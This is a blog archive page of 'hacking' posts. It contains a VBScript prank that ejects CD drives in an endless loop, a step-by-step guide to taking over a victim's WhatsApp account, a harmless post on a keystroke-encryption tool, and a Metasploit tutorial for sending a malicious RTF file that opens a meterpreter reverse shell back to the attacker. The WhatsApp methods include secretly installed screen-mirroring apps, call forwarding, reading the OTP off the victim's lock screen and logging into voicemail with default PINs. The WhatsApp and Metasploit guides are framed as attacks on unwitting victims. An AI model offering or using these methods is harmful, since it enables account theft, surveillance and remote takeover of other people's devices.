Showing posts with label Hack. Show all posts
Showing posts with label Hack. Show all posts

Sunday, 16 May 2021

SCRIPT TO POP UP CD DRIVE

 Do you still remember that some Disc has this?

If you try to copy a video or music by open it directly the this will happen?
Your CD/DVD POP UP ENDLESSLY?
 
Well, here how you can create it too using notepad..
 

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
 Set colCDROMs = oWMP.cdromCollection
 do
 if colCDROMs.Count >= 1 then
 For i = 0 to colCDROMs.Count – 1
 colCDROMs.Item(i).Eject
 Next
 For i = 0 to colCDROMs.Count – 1
 colCDROMs.Item(i).Eject
 Next
 End If
 wscript.sleep 100
 loop

 

Save it as CD.bat

 

 

Warning: Don't open it on your own PC

 

(Educational Purpose Only)

 

HACK WHATSAPP USING THESE TOP 5 TRICKS

  

1. SCREEN MIRRORING

Using this technique we can monitor victim’s live streaming. Not only WhatsApp, but we can also monitor each & every application and his/her activities. Steps to follow:

  • If somehow get the access to victim mobile for one min.
  • Now use this link to download the application/software on the victim's mobile.

http://gestyy.com/eihj9p

  • After installing, provide all the permission to this application.
  • Now, we will get a pop-up to start the streaming/Mirroring the device click on start.
  • This application will provide a URL in this format <http://192.168.0.19:5000/screen>.
  • Now, copy this URL and open it in the browser, we will be able to access the victim's screen

2. CALL FORWARDING TECHNIQUE

This is the best technique to hack the victim’s WhatsApp account.

  • If somehow get the access to victim mobile for 1 min.
  • Activate Call forwarding from victim’s mobile to hacker’s mobile using this code **21*<Mobile Number># and Dial. This will activate the call forwarding.
  • Now, open WhatsApp on Hackers Mobile and enter the victim’s number and click on next.
  • Here, we will have two options SMS and Call. Just click on the call option after one minute.
  • As we have activated the call forwarding on the victim's mobile, the OTP call from WhatsApp will be forwarded to your/hacker number.

3. OTP SNIFFING

OTP sniffing is an easy way to hack a victim’s account. This technique can be used to hack the WhatsApp of a person sitting next to you.

  • As we know, some people activate the option “display notification information on lock screen”.
  • Now, using this we can hack the victim’s WhatsApp account.
  • Open the WhatsApp Application and enter the victim’s number.
  • Now, click on ok.
  • The victim will receive OTP on his lock screen of the victim like this.
  • We can clearly view the OTP of the person sitting next to us.
  • Now, enter the OTP on your/hacker’s mobile and we can enjoy the victim’s Whatsapp account.


4. QR CODE SCAN

In the play store, we have different types of App to hack WhatsApp using QR codes. These Applications generate a QR code, Using the QR code we can access the victim’s WhatsApp

  • Use these links to download the Applications from the play store.

http://gestyy.com/eihkOe

http://gestyy.com/eihkAI

  • Open the apps on your/hacker mobile, after download.
  • We will see the QR codes, in this way.
  • Here, we got the QR code.
  • Now, Scan this QR code with the victim’s mobile. After scanning we will automatically get the victim’s WhatsApp on your/hacker’s device

5. VOICE MAIL

We can also hack the WhatsApp account using the voice mail option.

  • When we log into a WhatsApp account for authentication, we have two options SMS and Call.
  • If we click on-call victim receives a call on his mobile, In this case, if the victim is not able to answer the OTP call for authentication.
  • The victim will receive OTP by voice mail if the victim has enabled voice mail services.
  • Hackers are following the same process to hack the victim’s Whatsapp account using this voice mail option.
  • We can create a voice Mail on any number.
  • All service providers use a default user and password like “0000”, “1234” and, “last four digits of your number”.
  • Taking advantage of this, hackers target the victim at a time when a victim cannot take the verification call.
  • By using this technique hackers again call for OTP of Victim, when the victim's mobile is on voice mail.
  • After gaining access, a victim will not be able to access his/her account anymore.
















Friday, 3 July 2020

​​How To Encrypt Keyboard To Avoid Keyloggers


🔴Steps :

Step 1. First of all download and install the toolKeyScrambler.You Can Easily Get it on Google

Step 2. Now after downloading, install it and after complete installation, you have to reboot your system.

Step 3. Now when your computer boots up, right click on the icon of KeyScrambler in the system tray at the bottom of a screen.

Step 4. Now choose options from there and Keyscrambler will open

Step 5. Now you can alter settings in this according to your wish and after that simply click on ok. Now your key scrambler app is ready, open your browser and type anything you can see that your keystrokes are being encrypted.

That’s it! you are done, now you can see this tool every time you open your browser.


Friday, 10 February 2017

Remotely Hack A PC using Kali Linux & Metasploit

We will create a .rtf file and you need to send it to target. when your target will open this file in his/her Computer you will have a meterpreter session and You can do anything you want with the target system. that’s how you can hack a computer from your computer.
so that is the easiest way Most hackers can use to hack computers from another computer.
As usual we will start from Kali linux. You need to fire up Kali Linux. if You wana be an elite ethical hacker then here is a collection of some useful articles.
Let start the tutorial on how to hack a computer remotely.

Open Kali Linux and start msf console

You need to open Metasploit. You can fire up metasploit easily by going to
applications>Kali Linux>metasploit framework
How to hack a Computer Remotely ( Metasploit Tutorial )

Choose Exploit to hack a computer over internet

now its time to initialize your exploit. run this command in metasploit
use exploit/windows/fileformat/ms14_017_rtf

how to hack a computer-use exploit
if you want a detailed information about this exploit then you can find by just typing info
Now check what options we have or what we need to fill up.Just type in your console show options . and there will be a list of lots of options you can set with this exploit

Decide the FILENAME

You can decide the filename as you want. It depends on your target. here i am choosing filename as doc . so you need to type “set FILENAME doc.rtf “
how to hack a computer-set filename

Set the Payload

And finally as usual a payload can be set by using following command for the doc.rtf file . this payload will help us to start a meterpreter session to hack remote computers over internet.
set PAYLOAD windows/meterpreter/reverse_tcp
how to hack a computer-set payload

Set the LHOST

Next you need to set the LHOST . This is the ip which will be called when .rtf file will be executed. You can find your ip address by typing ipconfig in CMD and iwconfig in Kali Terminal . Type following command to set LHOST
set LHOST 192.168.1.112

How to hack a Computer Remotely ( Metasploit Tutorial )now type 
exploit

How to hack a Computer Remotely ( Metasploit Tutorial )

Open a Multi-Handler for the Connection

to accept the connection back to your system you need to set up Multi Handler. type this command
use exploit/multi/handler

How to hack a Computer Remotely ( Metasploit Tutorial )now set payload
 set PAYLOAD windows/meterpreter/reverse_tcp

How to hack a Computer Remotely ( Metasploit Tutorial )now set LHOST
 set LHOST 192.168.1.112

How to hack a Computer Remotely ( Metasploit Tutorial )AND execute finally
 exploit
that’s it . Now you need to send the .rtf file to your target, when someone will click on .rtf file, a meterpreter session will be started on your computer. Now you have almost full access to target system. You need to brush up your meterpreter commands.